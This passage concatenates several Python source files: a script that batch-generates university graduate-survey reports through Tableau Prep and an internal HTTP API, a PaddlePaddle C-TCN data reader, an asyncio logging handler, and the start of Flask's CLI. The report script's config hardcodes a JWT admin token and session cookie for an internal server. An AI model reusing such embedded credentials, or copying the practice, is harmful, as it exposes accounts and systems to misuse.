'to': r'e:\newjincin\projects\ros\doc\refresh\datasource\16届数据\分专业',
'type': 'file'
},
{
'from': r'E:\newjincin\projects\ros\doc\17届数据\分专业\{}\主数据源.xlsx',
'to': r'e:\newjincin\projects\ros\doc\refresh\datasource\17届数据\分专业',
'type': 'file'
},
{
'from': r'E:\newjincin\projects\ros\doc\18届数据\分专业\{}',
'to': r'e:\newjincin\projects\ros\doc\refresh\datasource\18届数据\分专业',
'type': 'directory'
}
],
},
    'major_alias':{},  # majors that were renamed
'prep_cli_path':r'"D:\Program Files\Tableau\TableauPrepBuilder2019\scripts\tableau-prep-cli.bat" -c "{}" -t "{}"',
'tfl_path':r'e:\newjincin\projects\ros\doc\refresh\tfl\专业\专业.tfl',
'flow_path':r'e:\newjincin\projects\ros\doc\refresh\tfl\专业\flow.json',
'http_config':{
'generate_url':'http://10.10.3.225:19700/v1/planProcessInfo/generatePlanWord',
        # planId (plan id) is required; the report name is college name + report + yyyy-MM-dd
'generate_param':{"planId":"27","generateName":""},
'searchstatus_url':'http://10.10.3.225:19700/v1/planProcessInfo/getByUser/{}',
'download_url':'http://10.10.3.225:19700/v1/planProcessInfo/downloadPlanWord',
'download_param':{"planProcessInfoId":"{}"},
'download_filename':r'e:\newjincin\projects\ros\doc\refresh\output\分专业\{}.docx',
'cookies':{
'Admin-Token':'eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJyb3MtbWFqb3IiLCJ1c2VySWQiOiI2ODI5MDMiLCJuYW1lIjoiUk9T5pON5L2c5Lq65ZGYIiwicm9sZXMiOlt7ImlkIjoyOSwiY29kZSI6bnVsbCwibmFtZSI6IlJPUyIsInN0YXR1cyI6bnVsbCwiY29sbGVnZUxpc3QiOm51bGwsIm1hbmFnZVNjb3BlTGlzdCI6bnVsbH1dLCJyb2xlVHlwZSI6IjAiLCJleHAiOjE1NTgwNzY2Mjh9.zY9gZZLuLTgUwIMmytMzTXDY79yhUc5xw6miNLRly9K19Haelw9ilpgwg24J6VY93j4fyIGmrmwKfr_UMI7tg9tMQwUlfrDhaKwQA6ll8lOgCafdEDrSe-h_rACT4j0kfaazxI3wl5w8HK3ka9MBtvPstkSa2hsTSDNkTaNFLMg',
'JSESSIONID':'F420351B4AD953795A66AC498B0FF18E',
'token':'eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJyb3MtbWFqb3IiLCJ1c2VySWQiOiI2ODI5MDMiLCJuYW1lIjoiUk9T5pON5L2c5Lq65ZGYIiwicm9sZXMiOlt7ImlkIjoyOSwiY29kZSI6bnVsbCwibmFtZSI6IlJPUyIsInN0YXR1cyI6bnVsbCwiY29sbGVnZUxpc3QiOm51bGwsIm1hbmFnZVNjb3BlTGlzdCI6bnVsbH1dLCJyb2xlVHlwZSI6IjAiLCJleHAiOjE1NTgwNzY2Mjh9.zY9gZZLuLTgUwIMmytMzTXDY79yhUc5xw6miNLRly9K19Haelw9ilpgwg24J6VY93j4fyIGmrmwKfr_UMI7tg9tMQwUlfrDhaKwQA6ll8lOgCafdEDrSe-h_rACT4j0kfaazxI3wl5w8HK3ka9MBtvPstkSa2hsTSDNkTaNFLMg',
}
},
    # Output report config: planId is the plan to use, reportname is the report name template, {} is filled with the major name
'output_report_config':[
{
'planId':'39','reportname':'{}专业2018届本科毕业生社会需求与人才培养调研结果'
},
{
'planId':'50','reportname':'{}专业2016-2018届本科毕业生调研结果对比分析'
}
]
}
college_major_mapping_path=r'e:\newjincin\projects\ros\doc\refresh\datasource\18届数据\院系-专业对照表.xlsx'
def print_and_info(msg):
logger.info(msg)
print(msg)
def backlog(msg):
back_logger.info(msg)
# Run college report generation
'''
type=1 generate college reports only; 2 generate major reports only; 3 generate both college and major reports
college_list: list of colleges to process
major_list: list of majors to process
'''
@decorator.timing
def college_batch_generate(type):
    # Set up the task queue
    # Check for an unfinished queue file; load it if present, otherwise initialize a new queue
    # taskqueuename='first'
    # exectype=0 # 0 = start a new run, 1 = resume an interrupted run
    # taskqueuepath=r'c:\{}.txt'.format(taskqueuename)
    # Read the configuration
    mapperObj=majorcollege2dict(college_major_mapping_path)
    # Get the list of college subdirectories and add them to the queue
    #dirlist=os.listdir(college_report_config['source-base-path'])
dirlist=mapperObj.college_major_mapping()
print_and_info(dirlist)
    # If all majors under a college are finished, remove that college
delete_key_list=[]
for dirobj in dirlist:
completeCount=0
majorCount=len(dirlist[dirobj])
for major in dirlist[dirobj]:
if major['status']==1:
completeCount+=1
if completeCount==majorCount:
delete_key_list.append(dirobj)
print(delete_key_list)
for deleteitem in delete_key_list:
dirlist.pop(deleteitem)
print_and_info(dirlist)
taskqueue=queue.Queue()
    noinqueue=[]  # colleges excluded from generation
#inqueue=['轨道交通学院']
#dirlist=inqueue
for onedir in dirlist:
if onedir not in noinqueue:
#if onedir in inqueue:
taskqueue.put(onedir)
print_and_info(onedir)
print(taskqueue)
print_and_info("------------------------")
while True:
if taskqueue.empty():
print_and_info('任务队列执行完毕!')
break
collegename=taskqueue.get()
if collegename is None:
break
        # Process the current directory (college)
print_and_info(collegename)
        # Copy the source files
fileexport.college_filecopy(collegename,college_report_config['exportconfig'],college_report_config['college_alias'])
        # Run the Tableau Prep CLI command to publish the data source
cmdline=college_report_config['prep_cli_path'].format(
college_report_config['flow_path'],
college_report_config['tfl_path'])
publishresult=publish.exec_publish(cmdline)
        if not publishresult:
            print_and_info("{}更新数据源失败".format(collegename))
            backlog("{}更新数据源失败".format(collegename))
            continue  # if one college fails to publish, move on to the next one
        if type==1:  # generate college reports only
college_exec_generate_report(collegename,college_report_config['output_report_config'])
        elif type==2:  # generate major reports only
for major_and_status in dirlist[collegename]:
majorname=major_and_status['major']
status=major_and_status['status']
if status==0:
major_generate(majorname,mapperObj,collegename)
        else:  # generate both college and major reports
college_exec_generate_report(collegename,college_report_config['output_report_config'])
for major_and_status in dirlist[collegename]:
majorname=major_and_status['major']
status=major_and_status['status']
if status==0:
major_generate(majorname,mapperObj,collegename)
print_and_info("------------------------")
print_and_info("执行完毕!")
# Generate college reports
@decorator.timing
def college_exec_generate_report(collegename,college_report_output_config):
    # Create worker threads
threads=[]
    # Call the report-generation API for each configured report
for output_config in college_report_output_config:
reportid=output_config['planId']
reportname=output_config['reportname'].format(collegename)
reportconfig=copy.deepcopy(college_report_config['http_config'])
reportconfig['generate_param']['planId']=reportid
reportconfig['generate_param']['generateName']=reportname
workthread=threading.Thread(target=httpinvoke.wrap_generate_and_download_report,args=(reportconfig,))
threads.append(workthread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
print_and_info('{}学院报告生成完毕!'.format(collegename))
def major_generate(majorname,mapperObj,collegename):
print_and_info('开始处理{}专业---'.format(majorname))
    # Copy the source files
fileexport.major_filecopy(majorname,major_report_config['exportconfig'])
    # Run the Tableau Prep CLI command to publish the data source
cmdline=major_report_config['prep_cli_path'].format(
major_report_config['flow_path'],
major_report_config['tfl_path'])
publishresult=publish.exec_publish(cmdline)
    if not publishresult:
print_and_info("{}更新数据源失败".format(majorname))
backlog("{}更新数据源失败".format(majorname))
return
backlog("{}更新数据源成功".format(majorname))
    # Create worker threads
threads=[]
    # Call the report-generation API
for output_config in major_report_config['output_report_config']:
reportid=output_config['planId']
reportname=output_config['reportname'].format(majorname)
reportconfig=copy.deepcopy(major_report_config['http_config'])
reportconfig['generate_param']['planId']=reportid
reportconfig['generate_param']['generateName']=reportname
        # Download the report into a directory named after the college, for easier management
downloadpath=reportconfig['download_filename']
split_path_list=os.path.split(downloadpath)
prepart=split_path_list[0]
afterpart=split_path_list[1]
reportconfig['download_filename']=prepart+'\\'+collegename+'\\'+afterpart
        # Create the new download directory if it does not exist yet
        new_downloadpath=prepart+'\\'+collegename
        if not os.path.isdir(new_downloadpath):
os.mkdir(new_downloadpath)
print('new path is '+new_downloadpath)
workthread=threading.Thread(target=httpinvoke.wrap_generate_and_download_report,args=(reportconfig,))
threads.append(workthread)
#httpinvoke.wrap_generate_and_download_report(reportconfig)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
    # TODO: add exception handling here
mapperObj.set_major_status(majorname,1)
print_and_info("------------------------")
print_and_info("执行完毕!")
def testdeletelist():
dirlist={'沙钢钢铁学院': [{'major': '冶金工程', 'status': 1}, {'major': '金属材料工程', 'status': 1}], '体育学院': [{'major': '武术与民族传统体育', 'status': 1}, {'major': '体育教育', 'status': 1}, {'major': '运动训练', 'status': 1}, {'major': '运动人体科学', 'status': 1}], '外国语学院': [{'major': '法语(法英双语)', 'status': 1}, {'major': '西班牙语', 'status': 1}, {'major': '日语', 'status': 1}, {'major': '翻译', 'status': 1}, {'major': '俄语(俄英双语)', 'status': 1}, {'major': '朝鲜语', 'status': 1}, {'major': '德语', 'status': 1}, {'major': '英语', 'status': 1}, {'major': '英语(师范)', 'status': 1}], '社会学院': [{'major': '历史学(师范)', 'status': 1}, {'major': '劳动与社会保障', 'status': 1}, {'major': '信息资源管理', 'status': 0}, {'major': '档案学', 'status': 0}, {'major': '旅游管理', 'status': 0}, {'major': '社会学', 'status': 0}], '文学院': [{'major': '汉语言文学', 'status': 0}, {'major': '汉语国际教育', 'status': 0}, {'major': '汉语言文学(基地)', 'status': 0}, {'major': '汉语言文学(师范)', 'status': 0}], '计算机科学与技术学院': [{'major': '信息管理与信息系统', 'status': 0}, {'major': '物联网工程', 'status': 0}, {'major': '软件工程(嵌入式软件人才培养)', 'status': 0}, {'major': '网络工程', 'status': 0}, {'major': '软件工程', 'status': 0}, {'major': '计算机科学与技术', 'status': 0}], '材料与化学化工学部': [{'major': '无机非金属材料工程', 'status': 0}, {'major': '化学工程与工艺', 'status': 0}, {'major': '应用化学', 'status': 0}, {'major': '环境工程', 'status': 0}, {'major': '高分子材料与工程', 'status': 0}, {'major': '材料科学与工程', 'status': 0}, {'major': '材料化学', 'status': 0}, {'major': '功能材料', 'status': 0}, {'major': '化学', 'status': 0}], '艺术学院': [{'major': '艺术设计学', 'status': 0}, {'major': '视觉传达设计', 'status': 0}, {'major': '服装与服饰设计', 'status': 0}, {'major': '环境设计', 'status': 0}, {'major': '美术学(师范)', 'status': 0}, {'major': '产品设计', 'status': 0}, {'major': '数字媒体艺术', 'status': 0}, {'major': '服装与服饰设计(时装表演与服装设计)', 'status': 0}, {'major': '美术学', 'status': 0}], '王健法学院': [{'major': '知识产权', 'status': 0}, {'major': '法学', 'status': 0}], '机电工程学院': [{'major': '机械电子工程', 'status': 0}, {'major': '工业工程', 'status': 0}, {'major': '电气工程及其自动化', 'status': 0}, {'major': '材料成型及控制工程', 'status': 0}, {'major': '机械工程', 'status': 0}], '纺织与服装工程学院': [{'major': '服装设计与工程', 'status': 0}, {'major': '纺织工程', 'status': 0}, {'major': '纺织工程(中外合作办学项目)', 'status': 0}, {'major': '非织造材料与工程', 'status': 0}, {'major': '轻化工程', 'status': 0}], '物理与光电·能源学部': [{'major': '物理学(师范)', 'status': 0}, {'major': '物理学', 'status': 0}, {'major': '光电信息科学与工程', 'status': 0}, {'major': '电子信息科学与技术', 'status': 0}, {'major': '新能源材料与器件', 'status': 0}, {'major': '能源与动力工程', 'status': 0}, {'major': '测控技术与仪器', 'status': 0}], '教育学院': [{'major': '应用心理学', 'status': 0}, {'major': '教育学(师范)', 'status': 0}, {'major': '教育技术学(师范)', 'status': 0}], '轨道交通学院': [{'major': '车辆工程', 'status': 0}, {'major': '电气工程与智能控制', 'status': 0}, {'major': '工程管理', 'status': 0}, {'major': '建筑环境与能源应用工程', 'status': 0}, {'major': '通信工程(城市轨道交通通信信号)', 'status': 0}, {'major': '交通运输', 'status': 0}], '数学科学学院': [{'major': '金融数学', 'status': 0}, {'major': '信息与计算科学', 'status': 0}, {'major': '数学与应用数学(基地)', 'status': 0}, {'major': '统计学', 'status': 0}, {'major': '数学与应用数学(师范)', 'status': 0}], '政治与公共管理学院': [{'major': '物流管理(中外合作办学项目)', 'status': 0}, {'major': '城市管理', 'status': 0}, {'major': '物流管理', 'status': 0}, {'major': '行政管理', 'status': 0}, {'major': '思想政治教育', 'status': 0}, {'major': '人力资源管理', 'status': 0}, {'major': '哲学', 'status': 0}, {'major': '管理科学', 'status': 0}, {'major': '公共事业管理', 'status': 0}], '传媒学院': [{'major': '广告学', 'status': 0}, {'major': '新闻学', 'status': 0}, {'major': '广播电视学', 'status': 0}, {'major': '播音与主持艺术', 'status': 0}], '医学部': [{'major': '食品质量与安全', 'status': 0}, {'major': '生物信息学', 'status': 0}, {'major': '法医学', 
'status': 0}, {'major': '护理学', 'status': 0}, {'major': '生物科学', 'status': 0}, {'major': '医学影像学', 'status': 0}, {'major': '药学', 'status': 0}, {'major': '预防医学', 'status': 0}, {'major': '口腔医学', 'status': 0}, {'major': '生物技术', 'status': 0}, {'major': '中药学', 'status': 0}, {'major': '医学检验技术', 'status': 0}, {'major': '生物制药', 'status': 0}, {'major': '临床医学', 'status': 0}, {'major': '放射医学', 'status': 0}], '金螳螂建筑学院': [{'major': '城乡规划', 'status': 0}, {'major': '建筑学(室内设计)', 'status': 0}, {'major': '园艺', 'status': 0}, {'major': '风景园林', 'status': 0}, {'major': '建筑学', 'status': 0}], '电子信息学院': [{'major': '电子科学与技术', 'status': 0}, {'major': '信息工程', 'status': 0}, {'major': '通信工程', 'status': 0}, {'major': '电子信息工程', 'status': 0}, {'major': '微电子科学与工程', 'status': 0}, {'major': '通信工程(嵌入式软件人才培养)', 'status': 0}], '音乐学院': [{'major': '音乐表演', 'status': 0}, {'major': '音乐学(师范)', 'status': 0}], '东吴商学院(财经学院)': [{'major': '市场营销', 'status': 0}, {'major': '金融学(中外合作办学项目)', 'status': 0}, {'major': '会计学', 'status': 0}, {'major': '财政学', 'status': 0}, {'major': '工商管理', 'status': 0}, {'major': '财务管理', 'status': 0}, {'major': '国际经济与贸易', 'status': 0}, {'major': '金融学', 'status': 0}, {'major': '经济学', 'status': 0}, {'major': '电子商务', 'status': 0}]}
print(len(dirlist))
delete_key_list=[]
for dirobj in dirlist:
completeCount=0
majorCount=len(dirlist[dirobj])
for major in dirlist[dirobj]:
if major['status']==1:
completeCount+=1
if completeCount==majorCount:
delete_key_list.append(dirobj)
print(delete_key_list)
for deleteitem in delete_key_list:
dirlist.pop(deleteitem)
print(dirlist)
print(len(dirlist))
if __name__ == "__main__":
college_batch_generate(type=2)
#mapperObj=majorcollege2dict(college_major_mapping_path)
#major_generate('播音与主持艺术',mapperObj,'文学院')
#testdeletelist()
|
ctcn_reader.py
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserve.
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
import os
import random
import cv2
import sys
import numpy as np
import gc
import copy
import multiprocessing
import logging
logger = logging.getLogger(__name__)
try:
import cPickle as pickle
from cStringIO import StringIO
except ImportError:
import pickle
from io import BytesIO
from .reader_utils import DataReader
from models.ctcn.ctcn_utils import box_clamp1D, box_iou1D, BoxCoder
python_ver = sys.version_info
#random.seed(0)
#np.random.seed(0)
class CTCNReader(DataReader):
"""
Data reader for C-TCN model, which was stored as features extracted by prior networks
dataset cfg: img_size, the temporal dimension size of input data
root, the root dir of data
snippet_length, snippet length when sampling
filelist, the file list storing id and annotations of each data item
rgb, the dir of rgb data
flow, the dir of optical flow data
batch_size, batch size of input data
num_threads, number of threads of data processing
"""
def __init__(self, name, mode, cfg):
self.name = name
self.mode = mode
self.img_size = cfg.MODEL.img_size # 512
self.snippet_length = cfg.MODEL.snippet_length # 1
self.root = cfg.MODEL.root # root dir of data
self.filelist = cfg[mode.upper()]['filelist']
self.rgb = cfg[mode.upper()]['rgb']
self.flow = cfg[mode.upper()]['flow']
self.batch_size = cfg[mode.upper()]['batch_size']
self.num_threads = cfg[mode.upper()]['num_threads']
if (mode == 'test') or (mode == 'infer'):
self.num_threads = 1 # set num_threads as 1 for test and infer
def random_move(self, img, o_boxes, labels):
boxes = np.array(o_boxes)
mask = np.zeros(img.shape[0])
for i in boxes:
for j in range(i[0].astype('int'),
min(i[1].astype('int'), img.shape[0])):
mask[j] = 1
mask = (mask == 0)
bg = img[mask]
bg_len = bg.shape[0]
if bg_len < 5:
return img, boxes, labels
insert_place = random.sample(range(bg_len), len(boxes))
index = np.argsort(insert_place)
new_img = bg[0:insert_place[index[0]], :]
new_boxes = []
new_labels = []
for i in range(boxes.shape[0]):
new_boxes.append([
new_img.shape[0],
new_img.shape[0] + boxes[index[i]][1] - boxes[index[i]][0]
])
new_labels.append(labels[index[i]])
new_img = np.concatenate(
(new_img,
img[int(boxes[index[i]][0]):int(boxes[index[i]][1]), :]))
if i < boxes.shape[0] - 1:
new_img = np.concatenate(
(new_img,
bg[insert_place[index[i]]:insert_place[index[i + 1]], :]))
new_img = np.concatenate(
(new_img, bg[insert_place[index[len(boxes) - 1]]:, :]))
del img, boxes, mask, bg, labels
gc.collect()
return new_img, new_boxes, new_labels
def random_crop(self, img, boxes, labels, min_scale=0.3):
boxes = np.array(boxes)
labels = np.array(labels)
imh, imw = img.shape[:2]
params = [(0, imh)]
for min_iou in (0, 0.1, 0.3, 0.5, 0.7, 0.9):
for _ in range(100):
                scale = random.uniform(min_scale, 1)
h = int(imh * scale)
y = random.randrange(imh - h)
roi = [[y, y + h]]
ious = box_iou1D(boxes, roi)
if ious.min() >= min_iou:
params.append((y, h))
break
y, h = random.choice(params)
img = img[y:y + h, :]
center = (boxes[:, 0] + boxes[:, 1]) / 2
mask = (center[:] >= y) & (center[:] <= y + h)
if mask.any():
boxes = boxes[np.squeeze(mask.nonzero())] - np.array([[y, y]])
boxes = box_clamp1D(boxes, 0, h)
labels = labels[mask]
else:
boxes = [[0, 0]]
labels = [0]
return img, boxes, labels
def resize(self, img, boxes, size, random_interpolation=False):
'''Resize the input PIL image to given size.
If boxes is not None, resize boxes accordingly.
Args:
img: image to be resized.
boxes: (tensor) object boxes, sized [#obj,2].
size: (tuple or int)
- if is tuple, resize image to the size.
- if is int, resize the shorter side to the size while maintaining the aspect ratio.
random_interpolation: (bool) randomly choose a resize interpolation method.
Returns:
img: (cv2's numpy.ndarray) resized image.
boxes: (tensor) resized boxes.
Example:
>> img, boxes = resize(img, boxes, 600) # resize shorter side to 600
'''
h, w = img.shape[:2]
if h == size:
return img, boxes
if h == 0:
img = np.zeros((512, 402), np.float32)
return img, boxes
ow = w
oh = size
sw = 1
sh = float(oh) / h
method = random.choice([
cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_CUBIC, cv2.INTER_AREA
]) if random_interpolation else cv2.INTER_NEAREST
img = cv2.resize(img, (ow, oh), interpolation=method)
if boxes is not None:
boxes = boxes * np.array([sh, sh])
return img, boxes
def transform(self, feats, boxes, labels, mode):
feats = np.array(feats)
boxes = np.array(boxes)
labels = np.array(labels)
#print('name {}, labels {}'.format(fname, labels))
if mode == 'train':
feats, boxes, labels = self.random_move(feats, boxes, labels)
feats, boxes, labels = self.random_crop(feats, boxes, labels)
feats, boxes = self.resize(
feats, boxes, size=self.img_size, random_interpolation=True)
h, w = feats.shape[:2]
img = feats.reshape(1, h, w)
Coder = BoxCoder()
boxes, labels = Coder.encode(boxes, labels)
if mode == 'test' or mode == 'valid':
feats, boxes = self.resize(feats, boxes, size=self.img_size)
h, w = feats.shape[:2]
img = feats.reshape(1, h, w)
Coder = BoxCoder()
boxes, labels = Coder.encode(boxes, labels)
return img, boxes, labels
def load_file(self, fname):
if python_ver < (3, 0):
rgb_pkl = pickle.load(
open(os.path.join(self.root, self.rgb, fname + '.pkl')))
flow_pkl = pickle.load(
open(os.path.join(self.root, self.flow, fname + '.pkl')))
else:
rgb_pkl = pickle.load(
open(os.path.join(self.root, self.rgb, fname + '.pkl')),
encoding='bytes')
flow_pkl = pickle.load(
open(os.path.join(self.root, self.flow, fname + '.pkl')),
encoding='bytes')
data_flow = np.array(flow_pkl['scores'])
data_rgb = np.array(rgb_pkl['scores'])
if data_flow.shape[0] < data_rgb.shape[0]:
data_rgb = data_rgb[0:data_flow.shape[0], :]
elif data_flow.shape[0] > data_rgb.shape[0]:
data_flow = data_flow[0:data_rgb.shape[0], :]
feats = np.concatenate((data_rgb, data_flow), axis=1)
if feats.shape[0] == 0 or feats.shape[1] == 0:
feats = np.zeros((512, 1024), np.float32)
logger.info('### file loading len = 0 {} ###'.format(fname))
return feats
def create_reader(self):
"""reader creator for ctcn model"""
if self.mode == 'infer':
return self.make_infer_reader()
if self.num_threads == 1:
return self.make_reader()
else:
return self.make_multiprocess_reader()
def make_infer_reader(self):
"""reader for inference"""
def reader():
with open(self.filelist) as f:
reader_list = f.readlines()
batch_out = []
for line in reader_list:
fname = line.strip().split()[0]
rgb_exist = os.path.exists(
os.path.join(self.root, self.rgb, fname + '.pkl'))
flow_exist = os.path.exists(
os.path.join(self.root, self.flow, fname + '.pkl'))
if not (rgb_exist and flow_exist):
                    logger.info('file not exist %s', fname)
continue
try:
feats = self.load_file(fname)
feats, boxes = self.resize(
feats, boxes=None, size=self.img_size)
h, w = feats.shape[:2]
feats = feats.reshape(1, h, w)
except:
logger.info('Error when loading {}'.format(fname))
continue
batch_out.append((feats, fname))
if len(batch_out) == self.batch_size:
yield batch_out
batch_out = []
return reader
def make_reader(self):
"""single process reader"""
def reader():
with open(self.filelist) as f:
reader_list = f.readlines()
if self.mode == 'train':
random.shuffle(reader_list)
fnames = []
total_boxes = []
total_labels = []
total_label_ids = []
for i in range(len(reader_list)):
line = reader_list[i]
splited = line.strip().split()
rgb_exist = os.path.exists(
os.path.join(self.root, self.rgb, splited[0] + '.pkl'))
flow_exist = os.path.exists(
os.path.join(self.root, self.flow, splited[0] + '.pkl'))
if not (rgb_exist and flow_exist):
# logger.info('file not exist', splited[0])
continue
fnames.append(splited[0])
frames_num = int(splited[1]) // self.snippet_length
num_boxes = int(splited[2])
box = []
label = []
for ii in range(num_boxes):
c = splited[3 + 3 * ii]
xmin = splited[4 + 3 * ii]
xmax = splited[5 + 3 * ii]
box.append([
float(xmin) / self.snippet_length,
float(xmax) / self.snippet_length
])
label.append(int(c))
total_label_ids.append(i)
total_boxes.append(box)
total_labels.append(label)
num_videos = len(fnames)
batch_out = []
for idx in range(num_videos):
fname = fnames[idx]
try:
feats = self.load_file(fname)
boxes = copy.deepcopy(total_boxes[idx])
labels = copy.deepcopy(total_labels[idx])
feats, boxes, labels = self.transform(feats, boxes, labels,
self.mode)
labels = labels.astype('int64')
boxes = boxes.astype('float32')
num_pos = len(np.where(labels > 0)[0])
except:
logger.info('Error when loading {}'.format(fname))
continue
if (num_pos < 1) and (self.mode == 'train' or
self.mode == 'valid'):
#logger.info('=== no pos for ==='.format(fname, num_pos))
continue
if self.mode == 'train' or self.mode == 'valid':
batch_out.append((feats, boxes, labels))
elif self.mode == 'test':
batch_out.append(
(feats, boxes, labels, total_label_ids[idx]))
else:
raise NotImplementedError('mode {} not implemented'.format(
self.mode))
if len(batch_out) == self.batch_size:
yield batch_out
batch_out = []
return reader
def make_multiprocess_reader(self):
"""multiprocess reader"""
def read_into_queue(reader_list, queue):
fnames = []
total_boxes = []
total_labels = []
total_label_ids = []
#for line in reader_list:
for i in range(len(reader_list)):
line = reader_list[i]
splited = line.strip().split()
rgb_exist = os.path.exists(
os.path.join(self.root, self.rgb, splited[0] + '.pkl'))
flow_exist = os.path.exists(
os.path.join(self.root, self.flow, splited[0] + '.pkl'))
if not (rgb_exist and flow_exist):
# logger.info('file not exist {}'.format(splited[0]))
continue
fnames.append(splited[0])
frames_num = int(splited[1]) // self.snippet_length
num_boxes = int(splited[2])
box = []
label = []
for ii in range(num_boxes):
c = splited[3 + 3 * ii]
xmin = splited[4 + 3 * ii]
xmax = splited[5 + 3 * ii]
box.append([
float(xmin) / self.snippet_length,
float(xmax) / self.snippet_length
])
label.append(int(c))
total_label_ids.append(i)
total_boxes.append(box)
total_labels.append(label)
num_videos = len(fnames)
batch_out = []
for idx in range(num_videos):
fname = fnames[idx]
try:
feats = self.load_file(fname)
boxes = copy.deepcopy(total_boxes[idx])
labels = copy.deepcopy(total_labels[idx])
feats, boxes, labels = self.transform(feats, boxes, labels,
self.mode)
labels = labels.astype('int64')
boxes = boxes.astype('float32')
num_pos = len(np.where(labels > 0)[0])
except:
logger.info('Error when loading {}'.format(fname))
continue
if (not (num_pos >= 1)) and (self.mode == 'train' or
self.mode == 'valid'):
#logger.info('=== no pos for {}, num_pos = {} ==='.format(fname, num_pos))
continue
if self.mode == 'train' or self.mode == 'valid':
batch_out.append((feats, boxes, labels))
elif self.mode == 'test':
batch_out.append(
(feats, boxes, labels, total_label_ids[idx]))
else:
raise NotImplementedError('mode {} not implemented'.format(
self.mode))
if len(batch_out) == self.batch_size:
queue.put(batch_out)
batch_out = []
queue.put(None)
def queue_reader():
with open(self.filelist) as f:
fl = f.readlines()
if self.mode == 'train':
random.shuffle(fl)
n = self.num_threads
queue_size = 20
reader_lists = [None] * n
file_num = int(len(fl) // n)
for i in range(n):
if i < len(reader_lists) - 1:
tmp_list = fl[i * file_num:(i + 1) * file_num]
else:
tmp_list = fl[i * file_num:]
reader_lists[i] = tmp_list
queue = multiprocessing.Queue(queue_size)
p_list = [None] * len(reader_lists)
# for reader_list in reader_lists:
for i in range(len(reader_lists)):
reader_list = reader_lists[i]
p_list[i] = multiprocessing.Process(
target=read_into_queue, args=(reader_list, queue))
p_list[i].start()
reader_num = len(reader_lists)
finish_num = 0
while finish_num < reader_num:
sample = queue.get()
if sample is None:
finish_num += 1
else:
yield sample
for i in range(len(p_list)):
if p_list[i].is_alive():
p_list[i].join()
return queue_reader
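# Illustrative construction sketch (assumption-heavy, not part of the model code):
# real configs come from the repo's YAML files; the AttrDict-style stand-in and
# the data paths below are hypothetical placeholders.
class _SketchCfg(dict):
    """Minimal config stand-in supporting both cfg.MODEL.attr and cfg['TRAIN'][key]."""
    __getattr__ = dict.__getitem__
def _example_create_reader():
    cfg = _SketchCfg(
        MODEL=_SketchCfg(img_size=512, snippet_length=1, root='data/ctcn'),
        TRAIN=_SketchCfg(filelist='data/ctcn/train.lst', rgb='rgb', flow='flow',
                         batch_size=4, num_threads=1))
    reader = CTCNReader('CTCN', 'train', cfg).create_reader()
    for batch in reader():  # each batch is a list of (feats, boxes, labels) tuples
        feats, boxes, labels = batch[0]
        break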
|
logging.py
|
"""Logging utilities."""
import asyncio
import logging
import threading
from .async_ import run_coroutine_threadsafe  # 'async' became a keyword in Python 3.7; assumes the helper module is named async_
class HideSensitiveDataFilter(logging.Filter):
"""Filter API password calls."""
def __init__(self, text):
"""Initialize sensitive data filter."""
super().__init__()
self.text = text
def filter(self, record):
"""Hide sensitive data in messages."""
record.msg = record.msg.replace(self.text, '*******')
return True
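# Illustrative usage (not part of the original module): attach the filter to a
# logger so every occurrence of the secret is masked, e.g.
#   logging.getLogger().addFilter(HideSensitiveDataFilter('my-api-password'))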
# pylint: disable=invalid-name
class AsyncHandler(object):
"""Logging handler wrapper to add a async layer."""
def __init__(self, loop, handler):
"""Initialize async logging handler wrapper."""
self.handler = handler
self.loop = loop
self._queue = asyncio.Queue(loop=loop)
self._thread = threading.Thread(target=self._process)
# Delegate from handler
self.setLevel = handler.setLevel
self.setFormatter = handler.setFormatter
self.addFilter = handler.addFilter
self.removeFilter = handler.removeFilter
self.filter = handler.filter
self.flush = handler.flush
self.handle = handler.handle
self.handleError = handler.handleError
self.format = handler.format
self._thread.start()
def close(self):
"""Wrap close to handler."""
self.emit(None)
@asyncio.coroutine
def async_close(self, blocking=False):
"""Close the handler.
When blocking=True, will wait till closed.
"""
if not self._thread.is_alive():
return
yield from self._queue.put(None)
if blocking:
# Python 3.4.4+
# pylint: disable=no-member
if hasattr(self._queue, 'join'):
yield from self._queue.join()
else:
while not self._queue.empty():
yield from asyncio.sleep(0, loop=self.loop)
def emit(self, record):
"""Process a record."""
ident = self.loop.__dict__.get("_thread_ident")
# inside eventloop
if ident is not None and ident == threading.get_ident():
self._queue.put_nowait(record)
# from a thread/executor
else:
self.loop.call_soon_threadsafe(self._queue.put_nowait, record)
def __repr__(self):
"""String name of this."""
return str(self.handler)
def _process(self):
"""Process log in a thread."""
support_join = hasattr(self._queue, 'task_done')
while True:
record = run_coroutine_threadsafe(
self._queue.get(), self.loop).result()
# pylint: disable=no-member
if record is None:
self.handler.close()
if support_join:
self.loop.call_soon_threadsafe(self._queue.task_done)
return
self.handler.emit(record)
if support_join:
self.loop.call_soon_threadsafe(self._queue.task_done)
def createLock(self):
"""Ignore lock stuff."""
pass
def acquire(self):
"""Ignore lock stuff."""
pass
def release(self):
"""Ignore lock stuff."""
pass
@property
def level(self):
"""Wrap property level to handler."""
return self.handler.level
@property
def formatter(self):
"""Wrap property formatter to handler."""
return self.handler.formatter
@property
    def name(self):
        """Wrap property name to handler."""
        return self.handler.get_name()
    @name.setter
    def name(self, name):
        """Wrap property name to handler."""
        self.handler.name = name
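# Illustrative wrapping sketch (not part of the original module): a caller wraps
# an ordinary handler so that emit() enqueues records onto the asyncio queue and
# the worker thread drains them; the level chosen here is a placeholder.
def _example_wrap_handler(loop):
    wrapped = AsyncHandler(loop, logging.StreamHandler())
    wrapped.setLevel(logging.INFO)
    # ...later, from inside the event loop: await wrapped.async_close(blocking=True)
    return wrapped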
|
cli.py
|
# -*- coding: utf-8 -*-
"""
flask.cli
~~~~~~~~~
A simple command line application to run flask apps.
:copyright: © 2010 by the Pallets team.
:license: BSD, see LICENSE for more details.
"""
from __future__ import print_function
import ast
import inspect
import os
import re
import ssl
import sys
